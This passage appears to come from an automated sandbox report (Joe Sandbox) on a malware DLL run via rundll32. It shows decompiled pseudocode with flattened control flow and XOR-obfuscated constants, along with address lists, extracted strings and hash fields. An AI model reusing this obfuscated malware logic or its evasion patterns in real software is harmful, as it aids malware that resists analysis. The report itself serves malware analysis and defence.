				_v1728 = _v1728 / _t524;
				_v1728 = _v1728 ^ 0x000019b1;
				_v1744 = 0x3123;
				_v1744 = _v1744 >> 1;
				_t525 = 0x47;
				_v1744 = _v1744 / _t525;
				_v1744 = _v1744 << 3;
				_v1744 = _v1744 ^ 0x00000404;
				_v1584 = 0x31fa;
				_v1584 = _v1584 | 0xbcd75914;
				_v1584 = _v1584 ^ 0xbcd71931;
				_v1688 = 0xb249;
				_t526 = 0x4f;
				_v1688 = _v1688 / _t526;
				_v1688 = _v1688 ^ 0xa50f5176;
				_v1688 = _v1688 ^ 0xa50f3b0e;
				_v1636 = 0x67e1;
				_v1636 = _v1636 ^ 0xd24f3fbb;
				_v1636 = _v1636 ^ 0xd24f2553;
				_v1720 = 0x1a95;
				_v1720 = _v1720 + 0xffffd1f0;
				_v1720 = _v1720 + 0xa43e;
				_v1720 = _v1720 << 0xf;
				_v1720 = _v1720 ^ 0x4861ebc3;
				_v1680 = 0xa370;
				_t527 = 0x4e;
				_v1680 = _v1680 / _t527;
				_v1680 = _v1680 + 0xffff016c;
				_v1680 = _v1680 ^ 0xffff4ffb;
				_v1708 = 0x7f6c;
				_t528 = 0x11;
				_v1708 = _v1708 / _t528;
				_v1708 = _v1708 + 0xfe59;
				_v1708 = _v1708 ^ 0x00011be3;
				_v1620 = 0xfbb5;
				_t529 = 0x75;
				_v1620 = _v1620 / _t529;
				_v1620 = _v1620 ^ 0x0000387e;
				_v1756 = 0xfefa;
				_v1756 = _v1756 << 1;
				_v1756 = _v1756 << 0xa;
				_v1756 = _v1756 | 0xfbee01d9;
				_v1756 = _v1756 ^ 0xfffff3cf;
				_v1588 = 0xe095;
				_v1588 = _v1588 ^ 0xec509d77;
				_v1588 = _v1588 ^ 0xec507baf;
				_v1704 = 0x4f7e;
				_v1704 = _v1704 + 0xffffd07a;
				_v1704 = _v1704 << 8;
				_v1704 = _v1704 ^ 0x001fd90c;
				_v1664 = 0x2dbe;
				_v1664 = _v1664 ^ 0xbbee1a06;
				_v1664 = _v1664 ^ 0xbbee013c;
				_v1732 = 0x71d;
				_v1732 = _v1732 >> 4;
				_v1732 = _v1732 << 0xf;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 ^ 0x000020b7;
				_v1712 = 0x4937;
				_v1712 = _v1712 | 0x6b6de1a6;
				_v1712 = _v1712 + 0xffffc223;
				_v1712 = _v1712 ^ 0x6b6d8429;
				_v1760 = 0x6a8c;
				_v1760 = _v1760 | 0x3a7fcc9a;
				_v1760 = _v1760 << 4;
				_v1760 = _v1760 ^ 0xd0e33f96;
				_v1760 = _v1760 ^ 0x771db75a;
				_v1652 = 0xc475;
				_v1652 = _v1652 << 2;
				_v1652 = _v1652 ^ 0x00037d60;
				_v1604 = 0x613f;
				_v1604 = _v1604 << 2;
				_v1604 = _v1604 ^ 0x0001b710;
				_v1724 = 0x7028;
				_v1724 = _v1724 * 0x60;
				_v1724 = _v1724 ^ 0xb165784c;
				_v1724 = _v1724 | 0x305b4d57;
				_v1724 = _v1724 ^ 0xb15f347e;
				_v1672 = 0x9c41;
				_v1672 = _v1672 + 0xfffffa02;
				_v1672 = _v1672 * 0x78;
				_v1672 = _v1672 ^ 0x00463452;
				_v1768 = 0x7143;
				_v1768 = _v1768 * 0x3f;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x7a6267bc;
				_v1768 = _v1768 ^ 0x7a63e7ca;
				_v1668 = 0x2cee;
				_v1668 = _v1668 + 0xffff34e1;
				_v1668 = _v1668 | 0xf3b35b58;
				_v1668 = _v1668 ^ 0xffff647e;
				_v1764 = 0xca11;
				_t530 = 0xa;
				_t517 = _v1568;
				_v1764 = _v1764 / _t530;
				_v1764 = _v1764 >> 0xa;
				_v1764 = _v1764 + 0xb6a7;
				_v1764 = _v1764 ^ 0x00008f9d;
				_v1592 = 0x5c93;
				_v1592 = _v1592 * 0x4b;
				_v1592 = _v1592 ^ 0x001b648b;
				_v1600 = 0x8ea7;
				_v1600 = _v1600 | 0x5280a637;
				_v1600 = _v1600 ^ 0x5280ad01;
				_v1580 = 0xb8bd;
				_v1580 = _v1580 ^ 0x9151149f;
				_v1580 = _v1580 ^ 0x9151ac23;
				while(1) {
					L1:
					_t531 = 0x5c;
					while(1) {
						L2:
						_t495 = 0x23f7b916;
						do {
							L3:
							if(_t577 == 0xc02cb2) {
								E10002BDE(_v1564, _v1668, _v1764, _v1592, _v1600);
								_t583 =  &(_t583[3]);
								_t577 = 0x7143daa;
								goto L18;
							} else {
								if(_t577 == 0x4ab133b) {
									E1001BA7B(_v1608, _t531, _v1616, _v1624, _t531,  &_v520, _v1632, _v1676);
									_t583 =  &(_t583[7]);
									_t577 = 0x163961dd;
									goto L1;
								} else {
									if(_t577 == 0xf729375) {
										_t518 =  *0x10021fd8; // 0x0
										_t519 = _t518 + 0x22c;
										while(1) {
											__eflags =  *_t519 - _t531;
											if(__eflags == 0) {
												break;
											}
											_t519 = _t519 + 2;
											__eflags = _t519;
										}
										_t517 = _t519 + 2;
										_t577 = 0x177ab919;
										goto L2;
									} else {
										if(_t577 == 0x163961dd) {
											_push(_v1572);
											_push(_v1612);
											_push(_v1576);
											_t499 = E1000B871(0x10001594, _v1748, __eflags);
											E1001D87D( &_v1040, __eflags);
											_t504 =  *0x10021fd8; // 0x0
											_t445 = _t504 + 0x1c; // 0x1c
											E10011E0D(_t445, __eflags,  &_v1040, _v1772, _v1648,  &_v1560, _t499, _v1776, 0x104,  &_v520, _v1656, _v1660, _v1740);
											E1000717B(_v1684, _v1692, _v1640, _t499, _v1700);
											_t583 =  &(_t583[0x11]);
											_t577 = 0xf729375;
											while(1) {
												L1:
												_t531 = 0x5c;
												goto L2;
											}
										} else {
											if(_t577 == 0x177ab919) {
												_push(_v1716);
												_push(_v1696);
												_push(_v1752);
												__eflags = E10009D7F(_v1736, _v1628, _v1728, 0x10001604, _v1744, _v1584,  &_v1564, 0x10001604, _v1688, 0x10001604, 0x10001604, _v1636, _v1596, E1000B871(0x10001604, _v1644, __eflags), 0x10001604, _v1720, _v1680);
												_t577 =  ==  ? 0x23f7b916 : 0x7143daa;
												E1000717B(_v1708, _v1620, _v1756, _t507, _v1588);
												_t583 =  &(_t583[0x15]);
												L18:
												_t495 = 0x23f7b916;
												_t531 = 0x5c;
											} else {
												if(_t577 == _t495) {
													_t516 = E100046A0(_v1564, _v1580, _v1760, _v1652,  &_v1560, _v1604, _v1724, _t517, _v1672, 2 + E1001D52C(_v1704, _v1664, _v1732,  &_v1560, _v1712) * 2,  &_v1560, _v1768);
													_t583 =  &(_t583[0xd]);
													_t577 = 0xc02cb2;
													_v1568 = 0 | _t516 == 0x00000000;
													while(1) {
														L1:
														_t531 = 0x5c;
														L2:
														_t495 = 0x23f7b916;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t577 - 0x7143daa;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

0x10018c4d
0x10018c53
0x10018c60
0x10018c6a
0x10018c75
0x10018c80
0x10018c8b
0x10018c96
0x10018c9e
0x10018ca3
0x10018cab
0x10018cb3
0x10018cbb
0x10018cc6
0x10018cd1
0x10018cdc
0x10018ce7
0x10018cf2
0x10018cfd
0x10018d0c
0x10018d1f
0x10018d26
0x10018d2b
0x10018d34
0x10018d3f
0x10018d47
0x10018d4f
0x10018d57
0x10018d5f
0x10018d67
0x10018d6f
0x10018d74
0x10018d7c
0x10018d84
0x10018d96
0x10018d99
0x10018da0
0x10018dab
0x10018db2
0x10018db9
0x10018dc4
0x10018dd7
0x10018dde
0x10018de9
0x10018df1
0x10018df6
0x10018dfb
0x10018e03
0x10018e0b
0x10018e1e
0x10018e25
0x10018e30
0x10018e38
0x10018e3d
0x10018e4a
0x10018e4e
0x10018e56
0x10018e61
0x10018e6c
0x10018e77
0x10018e82
0x10018e8d
0x10018e9a
0x10018ea8
0x10018ead
0x10018eb3
0x10018eb8
0x10018ec0
0x10018ec8
0x10018ed0
0x10018ed8
0x10018edd
0x10018ee5
0x10018eed
0x10018ef2
0x10018ef7
0x10018eff
0x10018f0a
0x10018f15
0x10018f20
0x10018f28
0x10018f2d
0x10018f35
0x10018f3d
0x10018f50
0x10018f53
0x10018f5a
0x10018f65
0x10018f6d
0x10018f75
0x10018f85
0x10018f89
0x10018f91
0x10018f99
0x10018fa1
0x10018fa6
0x10018fae
0x10018fb6
0x10018fbe
0x10018fc6
0x10018fce
0x10018fd9
0x10018fe1
0x10018fec
0x10018ff4
0x10019001
0x10019004
0x10019010
0x10019014
0x1001901c
0x10019024
0x1001902c
0x10019031
0x10019037
0x1001903c
0x10019044
0x1001904f
0x1001905a
0x10019065
0x10019071
0x10019074
0x10019078
0x10019080
0x10019088
0x10019093
0x100190a0
0x100190ab
0x100190b3
0x100190bb
0x100190c3
0x100190c8
0x100190d0
0x100190de
0x100190e3
0x100190e9
0x100190f1
0x100190f9
0x10019105
0x1001910a
0x10019110
0x10019118
0x10019120
0x10019132
0x10019135
0x1001913c
0x10019147
0x1001914f
0x10019153
0x10019158
0x10019160
0x10019168
0x10019173
0x1001917e
0x10019189
0x10019191
0x10019199
0x1001919e
0x100191a6
0x100191b1
0x100191bc
0x100191c7
0x100191cf
0x100191d4
0x100191d9
0x100191de
0x100191e6
0x100191ee
0x100191f6
0x100191fe
0x10019206
0x1001920e
0x10019216
0x1001921b
0x10019223
0x1001922b
0x10019236
0x1001923e
0x10019249
0x10019254
0x1001925c
0x10019267
0x10019270
0x10019274
0x1001927c
0x10019284
0x1001928c
0x10019294
0x100192a1
0x100192a5
0x100192ad
0x100192ba
0x100192c0
0x100192ca
0x100192d2
0x100192da
0x100192e2
0x100192ea
0x100192f2
0x100192fa
0x10019308
0x1001930b
0x10019312
0x10019316
0x1001931b
0x10019323
0x1001932b
0x1001933e
0x10019345
0x10019350
0x1001935b
0x10019366
0x10019371
0x1001937c
0x10019387
0x10019392
0x10019392
0x10019394
0x10019395
0x10019395
0x10019395
0x1001939a
0x1001939a
0x100193a0
0x10019632
0x10019637
0x1001963a
0x00000000
0x100193a6
0x100193ac
0x10019600
0x10019605
0x10019608
0x00000000
0x100193b2
0x100193b8
0x100195b3
0x100195b9
0x100195c4
0x100195c4
0x100195c7
0x00000000
0x00000000
0x100195c1
0x100195c1
0x100195c1
0x100195c9
0x100195cc
0x00000000
0x100193be
0x100193c4
0x10019501
0x1001950d
0x10019514
0x1001951f
0x1001952d
0x10019571
0x10019576
0x1001957f
0x100195a1
0x100195a6
0x100195a9
0x10019392
0x10019392
0x10019394
0x00000000
0x10019394
0x100193ca
0x100193d0
0x10019462
0x1001946b
0x1001946f
0x100194d5
0x100194f1
0x100194f4
0x100194f9
0x1001963c
0x1001963e
0x10019643
0x100193d6
0x100193d8
0x10019442
0x10019449
0x1001944e
0x10019456
0x10019392
0x10019392
0x10019394
0x10019395
0x10019395
0x00000000
0x10019395
0x10019392
0x100193d8
0x100193d0
0x100193c4
0x100193b8
0x100193ac
0x10019644
0x10019644
0x1001965d
0x1001965d
0x10019395

Strings

x, xrefs: 10018C80
,, xrefs: 100192DA
~8, xrefs: 1001913C
~O, xrefs: 10019189
Cq, xrefs: 100192AD
#1, xrefs: 1001901C
R4F, xrefs: 100192A5
Na, xrefs: 10018CFD
g, xrefs: 10019088
|}, xrefs: 10018EF7
?a, xrefs: 10019249
&, xrefs: 10018CDC
, xrefs: 10018E03
FA, xrefs: 10018E30
7I, xrefs: 100191E6
WM[0, xrefs: 1001927C

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #1$&$7I$?a$Cq$FA$Na$R4F$WM[0$x$|}$~8$~O$ $,$g
API String ID: 0-1818104641
Opcode ID: eac096b4bf47c36bfc53f599e92c0b8c5c713fca93f83362353275631a44e8a3
Instruction ID: a55f72ce1eee697c172fb6c89c403256cb30b90cf553297ebccdde5d50bdc51a
Opcode Fuzzy Hash: eac096b4bf47c36bfc53f599e92c0b8c5c713fca93f83362353275631a44e8a3
Instruction Fuzzy Hash: DB32F1715083819FE378CF20C98AA8BBBE2FBC5748F10891DE1D9962A0D7B59549CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10008EA1, Relevance: 19.1, Strings: 15, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10008EA1(void* __ecx, intOrPtr* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				void* _t325;
				intOrPtr _t352;
				void* _t358;
				signed int _t360;
				intOrPtr _t367;
				intOrPtr _t368;
				void* _t369;
				intOrPtr _t373;
				intOrPtr* _t380;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t393;
				char* _t416;
				char* _t419;
				signed int _t420;
				signed int _t421;
				signed int* _t426;
				void* _t429;

				_t424 = _a16;
				_t380 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t325);
				_v196 = 0x605e;
				_t426 =  &(( &_v260)[6]);
				_v128 = _v128 & 0x00000000;
				_t420 = 0x38984090;
				_t382 = 0x73;
				_v196 = _v196 * 0x2f;
				_v196 = _v196 | 0x04d19b38;
				_v196 = _v196 ^ 0x04d1bb3a;
				_v244 = 0x8bcc;
				_v244 = _v244 * 0x56;
				_v244 = _v244 >> 3;
				_v244 = _v244 / _t382;
				_v244 = _v244 ^ 0x00000d13;
				_v240 = 0x8bcb;
				_t383 = 0xa;
				_v240 = _v240 * 0x70;
				_v240 = _v240 + 0x7d6c;
				_v240 = _v240 | 0x73025eb7;
				_v240 = _v240 ^ 0x733f8b35;
				_v180 = 0x476a;
				_v180 = _v180 << 0xa;
				_v180 = _v180 + 0x8cc0;
				_v180 = _v180 ^ 0x011e2026;
				_v176 = 0xf90a;
				_v176 = _v176 | 0x8a47add6;
				_v176 = _v176 ^ 0x25f3ff80;
				_v176 = _v176 ^ 0xafb471ab;
				_v156 = 0x657b;
				_v156 = _v156 ^ 0x9cf0d9d9;
				_v156 = _v156 ^ 0x9cf09fdd;
				_v164 = 0xdecf;
				_v164 = _v164 + 0xfb10;
				_v164 = _v164 ^ 0x0001ec23;
				_v212 = 0xebf5;
				_v212 = _v212 << 2;
				_v212 = _v212 / _t383;
				_v212 = _v212 ^ 0x3f8842f3;
				_v212 = _v212 ^ 0x3f8876e2;
				_v232 = 0x8ee9;
				_v232 = _v232 << 0xf;
				_t384 = 0x27;
				_v232 = _v232 / _t384;
				_v232 = _v232 ^ 0x1882e06a;
				_v232 = _v232 ^ 0x19578564;
				_v148 = 0x4ce9;
				_v148 = _v148 + 0xfffff769;
				_v148 = _v148 ^ 0x00000784;
				_v152 = 0x5605;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x0002b08e;
				_v228 = 0x968f;
				_v228 = _v228 ^ 0x048ffebf;
				_v228 = _v228 + 0xfa8d;
				_v228 = _v228 + 0xffff7231;
				_v228 = _v228 ^ 0x048fe764;
				_v168 = 0xeda4;
				_v168 = _v168 >> 2;
				_v168 = _v168 ^ 0x00001911;
				_v236 = 0x8347;
				_v236 = _v236 ^ 0x77f7b461;
				_v236 = _v236 >> 5;
				_v236 = _v236 + 0xffffd315;
				_v236 = _v236 ^ 0x03bfebf4;
				_v136 = 0xc41c;
				_v136 = _v136 + 0xffffe572;
				_v136 = _v136 ^ 0x0000ebae;
				_v144 = 0x1215;
				_v144 = _v144 + 0x254b;
				_v144 = _v144 ^ 0x000035a3;
				_v132 = 0x60b8;
				_v132 = _v132 | 0x032ac8c9;
				_v132 = _v132 ^ 0x032aa5de;
				_v172 = 0xef97;
				_t385 = 0x65;
				_v172 = _v172 / _t385;
				_v172 = _v172 ^ 0x0000604b;
				_v216 = 0xbb9a;
				_v216 = _v216 + 0xa6e9;
				_v216 = _v216 << 2;
				_v216 = _v216 | 0x5c8131ee;
				_v216 = _v216 ^ 0x5c85aa35;
				_v140 = 0xba8f;
				_v140 = _v140 + 0x8878;
				_v140 = _v140 ^ 0x0001553b;
				_v188 = 0x6697;
				_v188 = _v188 + 0xfd99;
				_v188 = _v188 ^ 0xc086da95;
				_v188 = _v188 ^ 0xc087f5da;
				_v248 = 0xdc81;
				_t386 = 0x64;
				_v248 = _v248 / _t386;
				_v248 = _v248 << 0xf;
				_t387 = 0x13;
				_v248 = _v248 * 0x79;
				_v248 = _v248 ^ 0x854a41d5;
				_v160 = 0xc5ea;
				_v160 = _v160 ^ 0x1723a895;
				_v160 = _v160 ^ 0x17236bb0;
				_v252 = 0xba2e;
				_v252 = _v252 + 0xffff84fe;
				_v252 = _v252 / _t387;
				_v252 = _v252 >> 0xf;
				_v252 = _v252 ^ 0x0000724c;
				_v200 = 0xbe2e;
				_v200 = _v200 + 0xffffc143;
				_v200 = _v200 ^ 0xc039d031;
				_v200 = _v200 ^ 0xc039a4e9;
				_v256 = 0x8955;
				_v256 = _v256 ^ 0x45035c53;
				_v256 = _v256 + 0xf42e;
				_v256 = _v256 ^ 0x75aeaef6;
				_v256 = _v256 ^ 0x30aa1e7e;
				_v204 = 0x4a1a;
				_v204 = _v204 >> 4;
				_v204 = _v204 * 0x35;
				_v204 = _v204 ^ 0x0000ba25;
				_v224 = 0x9d77;
				_v224 = _v224 << 2;
				_v224 = _v224 ^ 0xee761fed;
				_v224 = _v224 ^ 0x8badabc6;
				_v224 = _v224 ^ 0x65d9c089;
				_v184 = 0x3ee8;
				_t388 = 0x5b;
				_v184 = _v184 / _t388;
				_t389 = 0x51;
				_v184 = _v184 * 0x33;
				_v184 = _v184 ^ 0x000039f6;
				_v208 = 0x1e37;
				_v208 = _v208 / _t389;
				_v208 = _v208 >> 4;
				_v208 = _v208 ^ 0x00002047;
				_v192 = 0xd95e;
				_v192 = _v192 + 0x9e21;
				_v192 = _v192 << 0xa;
				_v192 = _v192 ^ 0x05ddfc01;
				_t419 = _v120;
				goto L1;
				do {
					while(1) {
						L1:
						_t411 = _v260;
						_t349 = _v220;
						while(1) {
							L2:
							_t429 = _t420 - 0x285c7e59;
							if(_t429 > 0) {
								break;
							}
							if(_t429 == 0) {
								_v116 = 0x14;
								_t389 = _v244;
								_t358 = E100019D5(_t389, _v252, _v200, _v256,  &_v116, _v124, _v204, _t389, _v224, _t419 + 0x60);
								_t411 = _v260;
								_t426 =  &(_t426[8]);
								_t349 = _v220;
								if(_t358 == 0) {
									continue;
								}
								_t420 = 0x39022af8;
								_v128 = 1;
								while(1) {
									L1:
									_t411 = _v260;
									_t349 = _v220;
									goto L2;
								}
							}
							if(_t420 == 0x5a039f8) {
								_t360 = _a4 + 1;
								if((_t360 & 0x0000000f) != 0) {
									_t360 = (_t360 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t380 + 4)) = _t360 + 0x74;
								_push(_t389);
								_t419 = E1000A0AD( *((intOrPtr*)(_t380 + 4)), _t411);
								 *_t380 = _t419;
								if(_t419 == 0) {
									goto L29;
								} else {
									_t286 = _t419 + 0x74; // 0x74
									_t411 = _t286;
									_t389 = _a4;
									_t349 =  *((intOrPtr*)(_t380 + 4)) - 0x74;
									_v260 = _t286;
									_t420 = 0xe299623;
									_v120 = _t389;
									_v220 =  *((intOrPtr*)(_t380 + 4)) - 0x74;
									continue;
								}
							}
							if(_t420 == 0x5b07792) {
								_v112 = 0x6c;
								_t367 =  *0x10021fd4; // 0x0
								_t389 =  &_v112;
								_t368 =  *0x10021fd4; // 0x0
								_t369 = E10001AAB(_t389, _v196, _v216, _v140, _v188, _v248,  *((intOrPtr*)(_t368 + 0x20)), _v160,  *((intOrPtr*)(_t367 + 0x10)), _v192,  &_v108);
								_t426 =  &(_t426[9]);
								if(_t369 == 0) {
									_t420 = 0x39022af8;
									while(1) {
										L1:
										_t411 = _v260;
										_t349 = _v220;
										goto L2;
									}
								}
								_t393 =  &_v1;
								_t416 = _t419;
								do {
									 *_t416 =  *_t393;
									_t416 = _t416 + 1;
									_t393 = _t393 - 1;
								} while (_t393 >=  &_v96);
								_t420 = 0x285c7e59;
								while(1) {
									L1:
									_t411 = _v260;
									_t349 = _v220;
									goto L2;
								}
							}
							if(_t420 == 0x68ee996) {
								_t421 = _v128;
								if(_t421 == 0) {
									E100033F4(_v176, _v156, _v164, _v212,  *_t380);
								}
								L30:
								return _t421;
							}
							if(_t420 != 0xe299623) {
								goto L28;
							}
							_t373 =  *0x10021fd4; // 0x0
							E10013E5E(_t389,  &_v124, _v232, _v148, _t389, _v152,  *((intOrPtr*)(_t373 + 0x24)));
							_t426 =  &(_t426[5]);
							asm("sbb esi, esi");
							_t420 = (_t420 & 0x280bcbe3) + 0x68ee996;
							while(1) {
								L1:
								_t411 = _v260;
								_t349 = _v220;
								goto L2;
							}
						}
						if(_t420 == 0x2e9ab579) {
							_t389 = _v260;
							E1000E2FD(_t389, _v228, _a4, _v168,  *_t424);
							_t426 =  &(_t426[3]);
							_t420 = 0x382c48ec;
							break;
						}
						if(_t420 == 0x382c48ec) {
							_t352 =  *0x10021fd4; // 0x0
							E1001EDF3(_v124, _v236,  &_v120, _v136, _t411, _v144, _t389,  *((intOrPtr*)(_t352 + 0x10)), _v132, _t349, _v172);
							_t426 =  &(_t426[0xa]);
							asm("sbb esi, esi");
							_t420 = (_t420 & 0xccae4c9a) + 0x39022af8;
							while(1) {
								L1:
								_t411 = _v260;
								_t349 = _v220;
								goto L2;
							}
						}
						if(_t420 == 0x38984090) {
							_t420 = 0x5a039f8;
							goto L2;
						}
						if(_t420 != 0x39022af8) {
							break;
						}
						E1000A66C(_v124);
						_pop(_t389);
						_t420 = 0x68ee996;
					}
					L28:
				} while (_t420 != 0x324c3b0b);
				L29:
				_t421 = _v128;
				goto L30;
			}

0x10008ea9
0x10008eb0
0x10008eb4
0x10008eb5
0x10008ebc
0x10008ec3
0x10008eca
0x10008ecb
0x10008ecc
0x10008ed1
0x10008ed9
0x10008ee3
0x10008eeb
0x10008ef2
0x10008ef3
0x10008ef7
0x10008eff
0x10008f07
0x10008f16
0x10008f1a
0x10008f27
0x10008f2b
0x10008f33
0x10008f40
0x10008f43
0x10008f47
0x10008f4f
0x10008f57
0x10008f5f
0x10008f67
0x10008f6c
0x10008f74
0x10008f7c
0x10008f84
0x10008f8c
0x10008f94
0x10008f9c
0x10008fa4
0x10008fac
0x10008fb4
0x10008fbc
0x10008fc4
0x10008fcc
0x10008fd4
0x10008fe1
0x10008fe5
0x10008fed
0x10008ff5
0x10008ffd
0x10009006
0x10009009
0x1000900d
0x10009015
0x1000901d
0x10009028
0x10009033
0x1000903e
0x10009046
0x1000904b
0x10009053
0x1000905b
0x10009063
0x1000906b
0x10009075
0x1000907d
0x10009085
0x1000908a
0x10009092
0x1000909a
0x100090a2
0x100090a7
0x100090af
0x100090b7
0x100090c2
0x100090cd
0x100090d8
0x100090e3
0x100090ee
0x100090f9
0x10009104
0x1000910f
0x1000911a
0x10009128
0x1000912d
0x10009133
0x1000913b
0x10009143
0x1000914b
0x10009150
0x10009158
0x10009160
0x1000916b
0x10009176
0x10009181
0x10009189
0x10009191
0x10009199
0x100091a1
0x100091ad
0x100091b2
0x100091b8
0x100091c2
0x100091c3
0x100091c7
0x100091cf
0x100091d7
0x100091df
0x100091e7
0x100091ef
0x100091fd
0x10009201
0x10009206
0x1000920e
0x10009216
0x1000921e
0x10009226
0x1000922e
0x10009236
0x1000923e
0x10009246
0x1000924e
0x10009256
0x1000925e
0x10009268
0x1000926c
0x10009274
0x1000927c
0x10009281
0x10009289
0x10009291
0x1000929b
0x100092a9
0x100092ae
0x100092b9
0x100092ba
0x100092be
0x100092c6
0x100092d4
0x100092d8
0x100092dd
0x100092e5
0x100092ed
0x100092f5
0x100092fa
0x10009302
0x10009302
0x10009309
0x10009309
0x10009309
0x10009309
0x1000930d
0x10009311
0x10009311
0x10009311
0x10009317
0x00000000
0x00000000
0x1000931d
0x1000946e
0x1000949e
0x100094a2
0x100094a7
0x100094ab
0x100094b0
0x100094b4
0x00000000
0x00000000
0x100094ba
0x100094bf
0x10009309
0x10009309
0x10009309
0x1000930d
0x00000000
0x1000930d
0x10009309
0x10009329
0x10009417
0x1000941a
0x1000941f
0x1000941f
0x10009425
0x10009430
0x10009439
0x1000943b
0x10009440
0x00000000
0x10009446
0x10009449
0x10009449
0x1000944c
0x1000944f
0x10009452
0x10009456
0x1000945b
0x10009462
0x00000000
0x10009462
0x10009440
0x10009335
0x10009395
0x100093a5
0x100093aa
0x100093bb
0x100093da
0x100093df
0x100093e4
0x1000940a
0x10009309
0x10009309
0x10009309
0x1000930d
0x00000000
0x1000930d
0x10009309
0x100093e6
0x100093ed
0x100093ef
0x100093f1
0x100093f3
0x100093f4
0x100093fc
0x10009400
0x10009309
0x10009309
0x10009309
0x1000930d
0x00000000
0x1000930d
0x10009309
0x1000933d
0x100095b3
0x100095bc
0x100095d3
0x100095d8
0x100095a7
0x100095b2
0x100095b2
0x10009349
0x00000000
0x00000000
0x1000934f
0x10009371
0x10009376
0x1000937b
0x10009383
0x10009309
0x10009309
0x10009309
0x1000930d
0x00000000
0x1000930d
0x10009309
0x100094d5
0x10009577
0x10009586
0x1000958b
0x1000958e
0x00000000
0x1000958e
0x100094e1
0x1000952c
0x10009557
0x1000955c
0x10009561
0x10009569
0x10009309
0x10009309
0x10009309
0x1000930d
0x00000000
0x1000930d
0x10009309
0x100094e9
0x10009516
0x00000000
0x10009516
0x100094f1
0x00000000
0x00000000
0x10009506
0x1000950b
0x1000950c
0x1000950c
0x10009593
0x10009593
0x1000959f
0x1000959f
0x00000000

Strings

H,8, xrefs: 1000958E
Y~\(, xrefs: 10009311
H,8, xrefs: 100094DB
{e, xrefs: 10008F9C
l}, xrefs: 10008F47
G , xrefs: 100092DD
>, xrefs: 1000929B
^`, xrefs: 10008ED1
L, xrefs: 1000901D
K`, xrefs: 10009133
Lr, xrefs: 10009206
K%, xrefs: 100090E3
jG, xrefs: 10008F5F
l, xrefs: 10009395
Y~\(, xrefs: 10009400

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: G $K%$K`$Lr$Y~\($Y~\($^`$jG$l$l}${e$>$H,8$H,8$L
API String ID: 0-982405454
Opcode ID: 4eb52fbc29803f4b9f1c97484e41f5f3c7586420ffc1c63ee7bf2645c7a40f53
Instruction ID: 3f03585048c4344f547526a7651473315725b2e3c888534e364090f7e441b89b
Opcode Fuzzy Hash: 4eb52fbc29803f4b9f1c97484e41f5f3c7586420ffc1c63ee7bf2645c7a40f53
Instruction Fuzzy Hash: 030253728083819FE764CF25C985A4BBBF1FBC4748F108A1DF6D9862A0D7B59948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100095DD, Relevance: 16.6, Strings: 13, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E100095DD(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				void* __ecx;
				void* _t343;
				signed int _t361;
				signed int _t364;
				void* _t365;
				signed int _t368;
				void* _t377;
				signed int _t381;
				void* _t408;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int* _t429;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10017B8C(_t343);
				_v1640 = _v1640 & 0x00000000;
				_t429 =  &(( &_v1796)[7]);
				_v1636 = _v1636 & 0x00000000;
				_v1644 = 0x608807;
				_t377 = 0x187944ec;
